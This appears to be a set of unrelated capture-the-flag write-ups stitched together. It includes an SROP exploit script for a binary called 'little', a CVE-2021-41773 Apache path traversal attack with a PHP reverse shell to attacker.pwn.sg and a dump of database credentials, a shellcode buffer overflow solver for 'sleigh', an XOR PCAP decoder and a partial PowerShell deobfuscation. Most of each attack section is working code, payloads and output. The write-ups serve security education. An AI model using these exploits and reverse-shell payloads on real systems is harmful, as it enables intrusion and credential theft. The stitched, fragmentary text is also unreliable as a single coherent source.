*host1.metaproblems.com 5460*
*Note: No data is printed to start this challenge, and the Segmentation faults are part of the challenge*
This challenge had 56 solves by the end, and it was worth 275 points. I did not find it particularly difficult, but it provides a great, simple example of the SIGROP/SROP technique.
**TL:;DR Solution:** Note that this binary gives us very few gadgets, but it does include full control of rax and a syscall. When combined with the presence of a '/bin/sh' string within the binary, this presents a fairly straightforward opportunity to use SIGROP to execute execve(/bin/sh, 0, 0).
## Original Writeup Link
This writeup is also available on my GitHub! View it there via this link: https://github.com/knittingirl/CTF-Writeups/tree/main/pwn_challs/MetaCTF21/Little_Boi
## Gathering Information
When I attempt to run the binary, very little really happens. I am presented with no input prompt, and I simply enter some data, which segfaults the program.```knittingirl@piglet:~/CTF/metaCTF21$ ./littleaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSegmentation fault```If I use checksec, I can see that there are at least very few protections; pretty much the only thing in place is NX. NX essentially means that code on the stack is non-executable, so I will not be able to use shellcode unless I carve out an RWX segment myself using some other technique.```knittingirl@piglet:~/CTF/metaCTF21$ checksec little[*] '/home/knittingirl/CTF/metaCTF21/little' Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)```The next step is to open the program up in Ghidra. For this particular binary, the only function listed is _start, and the view in the decompilation windows is nearly useless. As a result, I need to rely heavily on reading the assembly, which is quite short. Basically, a stack location is getting pushed, then popped into the rsi register. Then 0 is getting pushed, the popped, into both rdi and rax. 0x800 is moved into the edx register, then there is a syscall. T
In x86-64 binaries, the function called by syscall is determined by the value in the rax register. The first three arguments to that function are then passed in the rdi, rsi, and rdx registers. You can keep track of which functions are referenced by a given syscall, as well as some details on their arguments, by looking at a syscall table like this one: https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
``` 00401000 54 PUSH RSP=>local_8 00401001 5e POP RSI 00401002 6a 00 PUSH 0x0 00401004 6a 00 PUSH 0x0 00401006 5f POP RDI 00401007 58 POP RAX 00401008 ba 00 08 MOV EDX,0x800 00 00 0040100d 0f 05 SYSCALL 0040100f c3 RET
```In this case, rax is being set to 0, which indicates a read call. This makes sense given the program's behavior. If I double-check how the read function works by looking at the man page, I can see that the first argument is the file descriptor that it is reading from, the second argument is the buffer that it is reading to, and the third argument is the number of characters that the read can take. Here, rdi is 0, which is the file descriptor for stdin, the second argument is a variable in the stack that I will be reading into, and the third argument of 0x800 means that I can read in up to 0x800 characters.```SYNOPSIS #include <unistd.h>
ssize_t read(int fd, void *buf, size_t count);
DESCRIPTION read() attempts to read up to count bytes from file descriptor fd into the buffer starting at buf.```
## Planning the Exploit:
Some very basic testing of the binary indicates that my first character already overflows the return pointer, so I have a clear ROP-based exploit with 0x800 bytes of payload available to me. The only potential problem is the lack of gadgets. ROPgadget detects a grand total of 10, all of which seem to be derived from that _start function. In addition, since no libc functions are used, no ret2libc approach is available.```knittingirl@piglet:~/CTF/metaCTF21$ ROPgadget --binary littleGadgets information============================================================0x000000000040100b : add byte ptr [rax], al ; syscall0x0000000000401009 : add byte ptr [rax], cl ; add byte ptr [rax], al ; syscall0x0000000000401005 : add byte ptr [rdi + 0x58], bl ; mov edx, 0x800 ; syscall0x0000000000401008 : mov edx, 0x800 ; syscall0x0000000000401010 : nop ; ret0x0000000000401007 : pop rax ; mov edx, 0x800 ; syscall0x0000000000401006 : pop rdi ; pop rax ; mov edx, 0x800 ; syscall0x0000000000401004 : push 0 ; pop rdi ; pop rax ; mov edx, 0x800 ; syscall0x000000000040100f : ret0x000000000040100d : syscall
Unique gadgets found: 10```Fortunately, the gadget at 0x0000000000401007 will provide me with both a pop rax, which grants me full control of that register, and a syscall. This is all that I need for a technique known as SIGROP. Basically, there is a syscall function known as a sigreturn that is called when rax is set to 0xf. When a sigreturn is called, it takes the current stack frame (i.e. the next few bytes on the stack after the syscall gadget) and loads them into all of the registers. This helpfully gives us access to all of the registers; specifically, control of rax, rip, rdi, rsi, and rdx will let us call effectively any system that we want, including execve. To clarify, rip, the return instruction pointer, can specify where the program starts executing next, so by setting it to a syscall gadget, I can call another syscall with rax and other registers filled with whatever I want.
The main hiccup to calling execve typically that it needs to called with a pointer to the string command that we want to execute, which is most typically /bin/sh. Fortunately, the exports section in ghidra references binsh; if I click on it, then click the address that it is referencing, I can see the string /bin/sh in a static location that I can easily load into rdi. I could also find this information by looking at the defined strings tab, again within Ghidra.
## Writing the Exploit:
One approach that I have taken when attempting to conceptualize how this technique works is appending the pwntools cyclic pattern after the syscall and seeing what gets loaded into the registers after making the call. For illustrative purposes, I will show that here. Here is the script that you can use to generate this result:```from pwn import *
target = process('./little')
pid = gdb.attach(target, "\nb *0x0040100f\n set disassembly-flavor intel\ncontinue")
syscall = p64(0x000000000040100d)syscall_pop_rax = p64(0x0000000000401007)
padding = b''payload = paddingpayload += syscall_pop_raxpayload += p64(0xf)payload += cyclic(300)
target.sendline(payload)
target.interactive()```And once I step down past the sigreturn in my ROPchain, here is what the registers look like in the GEF wrapper for GDB:```Program received signal SIGSEGV, Segmentation fault.0x6261617362616172 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]───────────────────────────────────────────────────────────────── registers ────$rax : 0x0 $rbx : 0x6261616962616168 ("haabiaab"?)$rcx : 0x6261616f6261616e ("naaboaab"?)$rdx : 0x6261616b6261616a ("jaabkaab"?)$rsp : 0x6261617162616170 ("paabqaab"?)$rbp : 0x6261616762616166 ("faabgaab"?)$rsi : 0x6261616562616164 ("daabeaab"?)$rdi : 0x6261616362616162 ("baabcaab"?)$rip : 0x6261617362616172 ("raabsaab"?)$r8 : 0x6161616c6161616b ("kaaalaaa"?)$r9 : 0x6161616e6161616d ("maaanaaa"?)$r10 : 0x616161706161616f ("oaaapaaa"?)$r11 : 0x6161617261616171 ("qaaaraaa"?)$r12 : 0x6161617461616173 ("saaataaa"?)$r13 : 0x6161617661616175 ("uaaavaaa"?)$r14 : 0x6161617861616177 ("waaaxaaa"?)$r15 : 0x6261617a61616179 ("yaaazaab"?)```This clarifies the fact that specific offsets in my stack frame get pushed into specific registers. Theoretically, I could use this debugger information to figure out the offsets needed to fill each register. Fortunately, pwntools provides an easier method; it can automatically create a sigreturn frame, and the contents of individual registers can then be filled with lines like "frame.rsi = 0". So, all I have to do is make my sigreturn, follow it with a sigreturn frame in which rax = 0x3b (for execve), rdi = '/bin/sh' string, rsi and rdx are 0, and rip = a syscall gadget. Here is an exploit script that does just that:```from pwn import *
#target = process('./little')
#pid = gdb.attach(target, "\nb *0x0040100f\n set disassembly-flavor intel\ncontinue")
target = remote('host1.metaproblems.com', 5460)
syscall = 0x000000000040100dsyscall_pop_rax = p64(0x0000000000401007)binsh = 0x00402000
padding = b''payload = padding
payload += syscall_pop_raxpayload += p64(0xf)
# Specify the architecturecontext.arch = "amd64"
frame = SigreturnFrame()
frame.rip = syscallframe.rdi = binsh frame.rax = 59frame.rsi = 0frame.rdx = 0
payload += bytes(frame)print(bytes(frame))
target.sendline(payload)
target.interactive()```Here is what my registers look like in GEF if I run it locally and debug:```$rax : 0x3b $rbx : 0x0 $rcx : 0x0 $rdx : 0x0 $rsp : 0x0 $rbp : 0x0 $rsi : 0x0 $rdi : 0x0000000000402000 → 0x0068732f6e69622f ("/bin/sh"?)$rip : 0x000000000040100d → <_start+13> syscall $r8 : 0x0 $r9 : 0x0 $r10 : 0x0 $r11 : 0x0 $r12 : 0x0 $r13 : 0x0 $r14 : 0x0 $r15 : 0x0 ```And here is the result against the live target:```knittingirl@piglet:~/CTF/metaCTF21$ python3 little_payload.py [+] Opening connection to host1.metaproblems.com on port 5460: Doneb'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 @\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\r\x10@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x003\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'[*] Switching to interactive mode$ lsflag.txtlittlelittle.sh$ cat flag.txtMetaCTF{5i9nAL5_3v3rYwH3r3}```Thanks for reading! |
Easy pnw task.1. Disassemble the binary and learn that in `main()` there are `char login[76]`, `char password[128]` and `int access`, located at the stack.2. Look that if login is too long, it will damage the access variable.3. Overflow login, and get shell access! Flag is in home dir. |
It’s Friday evening and you have been working nonstop for the past few days on your assignment due at midnight. Alas, fate is not on your side as your computer crashed! Luckily, with your forensics knowledge, you were able to take a snapshot of your memory. But now, your frazzled brain can’t remember what the state of your assignment was. Can you recover the information you need?
Challenge Files:https://drive.google.com/file/d/1Xyy__6d_bV3E5mRvF719i2nHJ0PHh7RZ/view?usp=sharing
Password: cs4w_2021_f1n4lz |
Making a sample request allows us to the obtain the following server banner:
```Server: Apache/2.4.49 (Debian)```
This tells us that the instance is vulnerable to [CVE-2021-41773](https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013).
Making the following request confirms exploitability.
```GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1Host: 139.59.2.201User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 22
echo;whoami;ls -la /```
The response yields a directory listing including a `flag.txt` file owned by `root:vulncon` alongwith the output of `id` indicating that we have code execution as the `www-data` user. This meansthat we will have to perform privilege escalation before we can read the flag.
```HTTP/1.1 200 OKDate: Sat, 04 Dec 2021 20:02:50 GMTServer: Apache/2.4.49 (Debian)Connection: closeContent-Length: 1632
www-datatotal 2136drwxr-xr-x 1 root root 4096 Dec 4 06:22 .drwxr-xr-x 1 root root 4096 Dec 4 06:22 ..-rwxr-xr-x 1 root root 0 Dec 4 06:22 .dockerenv-rw-r--r-- 1 root root 1402156 Nov 6 06:12 apache2-bin_2.4.49-4_amd64.deb-rw-r--r-- 1 root root 159956 Nov 6 06:12 apache2-data_2.4.49-4_all.deb-rw-r--r-- 1 root root 253952 Nov 6 06:12 apache2-utils_2.4.49-4_amd64.deb-rw-r--r-- 1 root root 268632 Nov 6 06:12 apache2_2.4.49-4_amd64.debdrwxr-xr-x 1 root root 4096 Dec 4 06:21 bindrwxr-xr-x 2 root root 4096 Aug 22 17:00 bootdrwxr-xr-x 5 root root 340 Dec 4 06:22 dev-rwxr-xr-x 1 root root 68 Nov 6 06:12 entry.shdrwxr-xr-x 1 root root 4096 Dec 4 06:22 etc-r--r----- 1 root vulncon 24 Dec 4 06:21 flag.txtdrwxr-xr-x 1 root root 4096 Dec 4 06:22 homedrwxr-xr-x 1 root root 4096 Dec 1 00:00 libdrwxr-xr-x 2 root root 4096 Dec 1 00:00 lib64drwxr-xr-x 2 root root 4096 Dec 1 00:00 mediadrwxr-xr-x 2 root root 4096 Dec 1 00:00 mntdrwxr-xr-x 2 root root 4096 Dec 1 00:00 optdr-xr-xr-x 162 root root 0 Dec 4 06:22 procdrwx------ 2 root root 4096 Dec 1 00:00 rootdrwxr-xr-x 1 root root 4096 Dec 4 06:22 rundrwxr-xr-x 1 root root 4096 Dec 4 06:21 sbindrwxr-xr-x 2 root root 4096 Dec 1 00:00 srvdr-xr-xr-x 13 root root 0 Dec 4 10:45 sysdrwxrwxrwt 1 root root 4096 Dec 4 18:51 tmpdrwxr-xr-x 1 root root 4096 Dec 1 00:00 usrdrwxr-xr-x 1 root root 4096 Dec 4 06:21 var
```
A reverse shell is obtained with the following payload:
```GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1Host: 139.59.2.201User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Length: 132
echo;php -r '$sock=fsockopen("attacker.pwn.sg",1337);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
```
Once we have a shell, we can read the mysql credentials from `connection.php`. Unfortunately, thereis no `mysql` binary available in the container so we just `scp` up one and use it to dump thedatabase.
```console$ /tmp/mysql -h apache_sql -u vulncon -pa8amisa^d8 -h apache_sql -e "use field_data; show tables; select * from login_details"mysql: [Warning] Using a password on the command line interface can be insecure.Tables_in_field_datalogin_detailsid first_name last_name password email internal_user1 John Doe Pass123 [email protected] false2 alice alice 123 [email protected] false3 boby bob rooe [email protected] false4 rock johnson 3131313 [email protected] false5 ronald duck recking [email protected] false6 jenny jen rolaa [email protected] false7 fish fight fishreal [email protected] false8 vulncon root jh^sJ9sd [email protected] true9 many many many-s [email protected] false10 borish bob roled [email protected] false11 rocket robbin robitu [email protected] false12 karma karmait karma [email protected] false13 dolly red dolly [email protected] false14 alice wonder alice123# [email protected] false15 ringit many ringit#@# [email protected] false16 rahul re 3232qss [email protected] false17 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin18 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin19 backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin20 systemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin mysql:x:104:110:MySQL Server,,,:/nonexistent:/bin/false tss:x:105:111:TPM software stack,,,:/var/lib/tpm:/bin/false21 messagebus:x:107:113::/nonexistent:/usr/sbin/nologin redsocks:x:108:114::/var/run/redsocks:/usr/sbin/nologin rwhod:x:109:65534::/var/spool/rwho:/usr/sbin/nologin iodine:x:110:65534::/run/iodine:/usr/sbin/nologin tcpdump:x:111:115::/nonexistent:/usr/sbin/nologin22 _rpc:x:113:65534::/run/rpcbind:/usr/sbin/nologin usbmux:x:114:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin rtkit:x:115:122:RealtimeKit,,,:/proc:/usr/sbin/nologin sshd:x:116:65534::/run/sshd:/usr/sbin/nologin statd:x:117:65534::/var/lib/nfs:/usr/sbin/nologin23 avahi:x:119:126:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin stunnel4:x:120:127::/var/run/stunnel4:/usr/sbin/nologin Debian-snmp:x:121:128::/var/lib/snmp:/bin/false speech-dispatcher:x:122:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false sslh:x:123:129::/nonexistent:/usr/sbin/nologin24 saned:x:125:133::/var/lib/saned:/usr/sbin/nologin inetsim:x:126:135::/var/lib/inetsim:/usr/sbin/nologin colord:x:127:136:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin geoclue:x:128:137::/var/lib/geoclue:/usr/sbin/nologin king-phisher:x:129:138::/var/lib/king-phisher:/usr/sbin/nologin25 kali:x:1000:1000:Devang Solanki,,,:/home/kali:/usr/bin/zsh systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin strongswan:x:131:65534::/var/lib/strongswan:/usr/sbin/nologin nm-openvpn:x:132:141:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin lightdm:x:133:142:Light Display Manager:/var/lib/lightdm:/bin/false26 dnsmasq:x:135:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin libvirt-qemu:x:64055:106:Libvirt Qemu,,,:/var/lib/libvirt:/usr/sbin/nologin$```
Now that we have obtained the password to `vulncon`, we can just `su` and login as that user beforereading the flag.
```console$ su vulnconPassword: jh^sJ9sdls -latotal 4204drwxrwxrwt 1 root root 4096 Dec 4 22:20 .drwxr-xr-x 1 root root 4096 Dec 4 06:22 ..-rw-r--r-- 1 www-data www-data 8 Dec 4 19:07 flag.txt-rwxr-xr-x 1 www-data www-data 250 Dec 4 20:07 fwUzzNz-rw-r--r-- 1 www-data www-data 9398 Dec 4 20:15 linPE-rwxr-xr-x 1 www-data www-data 959800 Dec 4 21:41 nc-rwxr-xr-x 1 www-data www-data 2914424 Dec 4 21:42 ncat-rw-r--r-- 1 www-data www-data 0 Dec 4 18:51 out-rwxr-xr-x 1 www-data www-data 375176 Dec 4 22:03 socat-rw-r--r-- 1 www-data www-data 4404 Dec 4 16:11 typescript-rwxrwxrwx 1 www-data www-data 3 Dec 4 17:40 vulncon-rw-r--r-- 1 www-data www-data 154 Dec 4 20:10 x-rw-r--r-- 1 www-data www-data 12 Dec 4 17:58 yes.shcat /flag.txtVULNCON{cv3_1s_aw3s0m3}```
**Flag:** `VULNCON{cv3_1s_aw3s0m3}` |
# Sleigh
The Elves have messed up with Santa's sleigh! Without it, he will not be able to deliver any gifts!! Help him repair it and save the holidays!
## Analysis
In this challenge we were given an ELF-64bit named `sleigh` with no canary, PIE enabled, and NX disabled.
```$ file sleigh; checksec sleigh sleigh: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1ad11f3bacb267e6e5667523bca200ab68a1683c, not stripped[*] '/home/kali/Documents/HTB/cyber santa/pwn_sleigh/sleigh' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX disabled PIE: PIE enabled RWX: Has RWX segments```
Let's try to run it
#### First try
#### Second try
It seems that we have to insert 1 for the first input and then use the address that were given (?). But the program shows that the NX is disabled, so we could input the shellcode into the stack and call it! Let's open the program using ida to see what the source code looks like.
#### main function```cint __cdecl main(int argc, const char **argv, const char **envp){ setup(*(_QWORD *)&argc, argv, envp); banner(); if ( (unsigned int)sleigh() != 1 ) goodbye(); repair(); return 0;}```
From the main function, it called 3 other function, banner(), goodbye(), and repair(). Function banner() only give the output of the sleigh and the function goodbye() used to exit the program. So if we give 1 for the first input, it will redirect us into the repair() function.
So, we need to dive into the function `repair` more!
#### repair```cint repair(){ __int64 buf; // [rsp+0h] [rbp-40h] __int64 v2; // [rsp+8h] [rbp-38h] __int64 v3; // [rsp+10h] [rbp-30h] __int64 v4; // [rsp+18h] [rbp-28h] __int64 v5; // [rsp+20h] [rbp-20h] __int64 v6; // [rsp+28h] [rbp-18h] __int64 v7; // [rsp+30h] [rbp-10h] __int64 v8; // [rsp+38h] [rbp-8h]
buf = 0LL; v2 = 0LL; v3 = 0LL; v4 = 0LL; v5 = 0LL; v6 = 0LL; v7 = 0LL; v8 = 0LL; fprintf( _bss_start, "%s\n[!] There is something written underneath the sleigh: [%p]\n\n", "\x1B[1;32m", &buf, 0LL, 0LL, 0LL, 0LL, 0LL, 0LL, 0LL, 0LL); fprintf(_bss_start, "%s[*] This might help the repair team to fix it. What shall they do?\n> ", "\x1B[1;34m"); read(0, &buf, 0xA4uLL); return fprintf(_bss_start, aSUnfortunately, "\x1B[1;31m");}```
Turns out the address that were printed was from the first variable in function repair. It seems that we can overflow the buffer from this area. So let's get the data that we need.
First, we could use gdb to create a pattern.```$ gdb -q ./sleigh Reading symbols from ./sleigh...(No debugging symbols found in ./sleigh)gdb-peda$ pattern create 100'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'```
Next, run the program and send the pattern.```gdb-peda$ rStarting program: /home/kali/Documents/HTB/cyber santa/pwn_sleigh/sleigh
? ❄ Dashing through the snow.. ❄ ? ▓▓██████████████████████████▓▓ ██████████████████████████████████ ██████████████████████████████████████ ████████████████████████████████████████ ████████████████ ██████████████████████ ▒▒██████ ▓▓██████████████████ ████████ ██████████████████████ ██████ ████████ ██████████████████████▓▓ ████████████ ████████▒▒████████████████████████████ ██████████████ ████████████████████████████████████████ ██████████████ ██████████████████████████████████████████▒▒ ████████ ██████ ████████████████████████████████████████████ ██████████ ██ ████████████████████ ████████████████████████████ ██████████ ████████████████████ ████████████████████████████████████████████████████████ ██████████████ ██████████████████████████████████████████████████ ████████████████▓▓ ██████████████ ▒▒ ████████████████████████████████ ████████████████ ██████████████ ████████████████████████████████ ██████████████ ▓▓████ ██████████████ ▓▓ ████████████████████████████████ ████████████████████████████████████████████████████████████████████████ ████████████████████████████████████████████████████████████████████ ████████████████████████████████████████████████████████████████ ▓▓▓▓▓▓ ▓▓▓▓▓▓ ▒▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒ ▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒ ▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
1. Repair ⚒ 2. Abandon ? > 1 [!] There is something written underneath the sleigh: [0x7fffffffdeb0] [*] This might help the repair team to fix it. What shall they do? > AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL [-] Unfortunately, the sleigh could not be repaired! ? Program received signal SIGSEGV, Segmentation fault.```
From the output above, we can determine which part of our pattern is hitting the return in the main function by examining the `$rsp`.```gdb-peda$ x/gx $rsp0x7fffffffdef8: 0x4134414165414149gdb-peda$ pattern offset 0x41344141654141494698452060381725001 found at offset: 72```
Nice, we got the offset/padding. Now we need to get the shellcode from [shellstorm](http://shell-storm.org/shellcode/files/shellcode-806.php).```char code[] = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";```
## Exploit
Let's make a solver using python```pythonfrom pwn import *
offset = 72pop_rdi = 0x0000000000000c63ret = 0x000000000000076eshellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
elf = ELF("./sleigh")s = elf.process()
print(s.recvuntil(b"> ").decode())print("1")s.sendline(b"1")
print(s.recvuntil(b"There is something written underneath the sleigh: [").decode())
# strip to remove the unneeded part "]\n" and convert it into integerleakVariable = int(s.recvline(b"]").strip(b"]\n"), 16)
log.info(f"leak address of variable: {hex(leakVariable)}")
# shellcode were put in the first or in the beginning of the payload, because we will fill the buffer# where shellcode will be stored in variable buf (first variable in function repair)# after filling the buffer, we will call the variable buf to execute the shellcodepayload = shellcodepayload += b"A"*(offset-len(shellcode))payload += p64(leakVariable)
print(payload)s.sendline(payload)
s.interactive()
s.close()```
Now we need to do is just run the program to make sure it works on local first!
It works! To access the server remotely, we need to add remote to server using host and port.
```pythonfrom pwn import *
host = "178.62.123.156"port = 31694
offset = 72pop_rdi = 0x0000000000000c63ret = 0x000000000000076eshellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
elf = ELF("./sleigh")# s = elf.process()s = remote(host, port)
print(s.recvuntil(b"> ").decode())print("1")s.sendline(b"1")
print(s.recvuntil(b"There is something written underneath the sleigh: [").decode())
# strip to remove the unneeded part "]\n" and convert it into integerleakVariable = int(s.recvline(b"]").strip(b"]\n"), 16)
log.info(f"leak address of variable: {hex(leakVariable)}")
# shellcode were put in the first or in the beginning of the payload, because we will fill the buffer# where shellcode will be stored in variable buf (first variable in function repair)# after filling the buffer, we will call the variable buf to execute the shellcodepayload = shellcodepayload += b"A"*(offset-len(shellcode))payload += p64(leakVariable)
print(payload)s.sendline(payload)
s.interactive()
s.close()```
Now all we need to do is just run the program!
Flag: `HTB{d4sh1nG_thr0ugH_th3_sn0w_1n_4_0n3_h0r53_0p3n_sl31gh!!!}` |
Reverse the ASM and apply the same logic to decrypt the TCP payload data from the PCAP. Walkthrough to follow: https://www.youtube.com/watch?v=3GGpyEkt8GE&t=2206s
```pyfrom pwn import *
enc = unhex(b'5b2fedd4801914e7eb765119d4fe6223f1d1984638a9816b5419dac07b27eed9d35e09fdef65521ac5877a24eed19b0c0ae9f16d4c02cc86773bfaa8924a2ae9a12a2f1dd7923d39eea78d5909f9f57b2a16ddc87d33ada58f1208d4f737755283da1168a3e6cc075e8ce920774ef88d483fb1bb8a440884af7d69e2c5874b3bb3be695d4fd5a97b27e7d7d0572cf0bf665405dbfe4225e19b824813e4b96a4e178a95776fe1d8800b0bf7f0705719c0c37834a8f7a26f1febbe3d7119dad66427d5f58b4259eabc3f3626ded46621d3b0ca441afce552274bd6da1f2a')
dec = b''
for i, byte in enumerate(enc): dec += xor(chr((55 * i + 19) % 256), byte)
success(dec.decode())``` |
1. After unzipping you will have a script like this:
```powershell ( [ruNtimE.iNTErOpServiCes.mARSHaL]::pTRtOSTRINgUnI( [RUnTiME.INteroPSERVIceS.mArsHAL]::sEcUrEsTrINgTOgLObalaLLoCUNICodE($('$PAYLOAD' |CONvErtTo-secURESTRInG -k (33..2)) ) )) | . ((VaRiAbLe '*MDr*').nAme[3,11,2]-JoIn'') ```
*Here I replaced the payload with `$PAYLOAD`
Here we can see 3 PowerShell function:
`ConvertTo-SecureString`
`SecureStringToGlobalAllocUnicode`
`PtrToStringUni`
I have not worked with a PowerShell before, so I'm not sure how exactly all of the APIs works, but I can assume that here the script just deobfuscates the payload and tries to run it as a command using pipe.
1. My thinking was that we can run the part that comes before the pipe to deobfuscate the payload:
This part:
```powershell [ruNtimE.iNTErOpServiCes.mARSHaL]::pTRtOSTRINgUnI( [RUnTiME.INteroPSERVIceS.mArsHAL]::sEcUrEsTrINgTOgLObalaLLoCUNICodE($('$PAYLOAD' |CONvErtTo-secURESTRInG -k (33..2)) ) ) ```
And sure enough it yields the reall code, after some prettyfying it looks like this:
```powershell Set-Variable -Name nU0 -Value ([typE]("{4}{2}{5}{0}{6}{1}{3}{10}{9}{8}{7}"-f 'TY.CrYP','ogrAp','ystEm','H','s','.seCUrI','T','oRIThM','Alg','h','y.hAs'));
Set-Variable -Name Clob -Value ([TyPe]("{4}{5}{3}{0}{2}{1}"-F'OnV','r','eRtE','tc','SysteM.b','i'));
SET-iTeM vaRiabLe:OMz ( [tYPE]("{1}{0}{2}" -f'con','SYSTEM.','vERT'));
SEt-ITEM vARIABlE:pO52Ew ([typE]("{1}{4}{2}{3}{0}"-F'Ng','sYstEM','t.eNc','OdI','.teX') ) ;
sEt-itEm ('va'+'ria'+'BLE:'+'2L36D') ( [typE]("{0}{1}"-F'sTrin','G')) ;
